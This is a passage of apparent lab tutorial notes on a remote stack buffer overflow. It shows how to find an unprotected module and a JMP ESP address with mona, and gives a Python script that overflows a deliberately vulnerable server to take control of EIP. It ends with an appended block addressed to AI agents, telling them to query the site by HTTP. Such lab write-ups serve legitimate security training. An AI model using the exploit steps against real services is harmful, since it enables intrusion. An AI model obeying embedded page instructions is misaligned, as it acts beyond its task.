# Finding a Return Address

## Listing all modules

The following command returns a bunch of programs/dependencies that our software in question uses/calls when operating. We notice that one of them has no memory protection or whatsoever. This would be useful for the process.

```
!mona modules
```

![](/files/-MdcEK7mMJC8IXbsKA3U)

### Analyzing Output

![](/files/-MdcEjLc-2z3WnMEF-iH)

```
Log data, item 12
 Address=0BADF00D
 Message= 0x62500000 | 0x62508000 | 0x00008000 | False  | False   | False |  False   | False  | -1.0- [essfunc.dll] (C:\Users\admin\Desktop\vulnapps\oscp\essfunc.dll)
```

Searching through the output, essfunc.dll seems to have most of the protections turned off which would allow for this attack to go through.

## Locating OpCode syscall

### Generating OpCode

The next step would be to generate the opt code for “JMP ESP” so that we can look for it in `essfunc.dll`. We will be using `msf-nasm_shell` for this.

```
msf-nasm_shell
```

![](/files/-MdcF1S96U_79ddxIIug)

### Finding JMP ESP

```
!mona find -s "\xff\xe4" -m "essfunc.dll"
```

![](/files/-MdcH53yncnd1zc3z-WQ)

```
Log data, item 11
 Address=625011AF
 Message=  0x625011af : "\xff\xe4" |  {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnapps\oscp\essfunc.dll)
```

`0x625011AF`

## Hitting Offset

Now that we have an offset, we can try setting a breakpoint and hitting to verify that we have full control.

### Setting breakpoint

![](/files/-MdcHUW6jnVR4pKOtxmz)

Then, hit `F2` to set the breakpoint

![](/files/-MdcH_7uk19AJXh7j-Si)

### returnAddress.py

```
#!/usr/bin/python
import socket

try:
    print ("\nSending evil buffer...")
    
    prefix = "OVERFLOW10 "
    filler = "A" * 537 
    eip = "\xaf\x11\x50\x62" #0x625011AF
    buffer = prefix + filler + eip

    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

    s.connect(("windows.box", 1337))
    s.send(buffer)

    s.close()

    print ("\nDone!")
  
except:
    print ("\nCould not connect!")
```

### Hitting breakpoint

```
python returnAddress.py
```

![](/files/-MdcHkV8L6SdjwWlWCbi)

![](/files/-MdcHmOKM2xPd7N0qsJ6)

Our debugger shows that we did hit the JMP ESP and hit the breakpoint that we set previously.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://repo.4pfsec.com/buffer-overflow/remote-buffer-overflow/finding-a-return-address.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.